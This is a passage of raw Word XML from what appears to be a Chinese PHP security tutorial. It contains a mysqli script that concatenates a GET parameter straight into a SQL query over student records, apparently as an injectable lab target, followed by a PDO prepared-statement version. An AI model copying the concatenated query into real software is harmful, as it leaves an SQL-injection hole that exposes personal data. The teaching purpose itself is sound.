      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>// echo '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库连接成功！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FFDDF3" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F27AAF" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31596963" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqli_select_db( $conn, 'teaching' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2CBE53" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258E5B4F" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拼接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6151A16A" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// $sql = 'SELECT * from `self_table` where id=1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AA56CC" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08D08A2F" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传参拼接入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4351D7C9" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$id = $_GET['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D00207" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$sql = 'SELECT * from `self_table` where id='.$id.";";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EA8F61" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C8B1EA1" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$retval = mysqli_query( $conn, $sql );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1022EEA4" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>if(! $retval )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2729CF7D" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A09B3F2" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    die('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法读取数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: ' . mysqli_error($conn));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314913F8" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8FEEC1" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC73DE7" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打印结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659E8DF3" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$res = mysqli_fetch_array($retval);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB8849D" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// print_r($res);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C42CA3" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print_r($res['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF14C7F" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13107177" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print_r($res['stu_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DDA716" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5FF46B" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print_r($res['name']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E30AFC4" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3FEEC" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print_r($res['email']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE75C01" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C17C03" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print_r($res['idcard']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABF5D45" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6A2CA2" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print_r($res['score']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F1366" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "&lt;br&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD81402" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3884768E" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC4F9BB" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqli_close($conn);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAD5419" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038022C5" w14:textId="77777777" w:rsidR="00073335" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409B95B4" w14:textId="1F2E747A" w:rsidR="0077554E" w:rsidRDefault="00073335" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="750" w:name="_Toc159780178"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询及特性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="750"/>
    </w:p>
    <w:p w14:paraId="233F1629" w14:textId="77777777" w:rsidR="0077554E" w:rsidRDefault="0077554E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6EA407" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71976433" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$dbms='mysql';     //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EBF98E" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$host='localhost'; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库主机名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D18E56" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$dbName='security';    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的数据库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4E333D" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$user='root';      //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库连接用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F107544" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>$pass='root';          //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256F7DD5" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$dsn="$dbms:host=$host;dbname=$dbName";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B1CD6" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CE0A06" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62633835" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137033A8" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    $dbh = new PDO($dsn, $user, $pass); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PDO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A64CF" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;br/&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7A3C8E" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    /*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你还可以进行一次搜索操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3871E7E2" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    foreach ($dbh-&gt;query('SELECT * from FOO') as $row) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D989D8" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print_r($row); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> echo($GLOBAL); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来看到这些值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2889D48C" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AABD7B9" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7FBE62" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>} catch (PDOException $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B777D6" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    die ("Error!: " . $e-&gt;getMessage() . "&lt;br/&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617D3C75" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C854E0A" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认这个不是长连接，如果需要数据库长连接，需要最后加一个参数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">array(PDO::ATTR_PERSISTENT =&gt; true) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变成这样：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410FA0F0" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>//$db = new PDO($dsn, $user, $pass, array(PDO::ATTR_PERSISTENT =&gt; true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9DDFB9" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369C6917" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297869A1" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$dbh-&gt;exec("set names 'utf8'"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7909E7" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7D902D" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$sql = "select * from security.users where id=? limit 1";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1510DD1A" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42FEDE40" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$stmt = $dbh-&gt;prepare($sql);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A112BE" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C58E688" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$name = $_GET['id'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6990AB46" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑定参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E077B49" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$stmt-&gt;bindValue(1,$name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30119E13" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行预处理语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEA10CD" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$stmt-&gt;execute();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64935067" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推荐这种方式来获取查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028067A6" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>while ($row=$stmt-&gt;fetch())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1314F1D2" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258DC6B5" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print_r($row);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0CC7D3" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445ABABA" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释放查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BA3993" w14:textId="77777777" w:rsidR="004F1A3F" w:rsidRDefault="004F1A3F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$stmt = null;</w:t>
      </w:r>
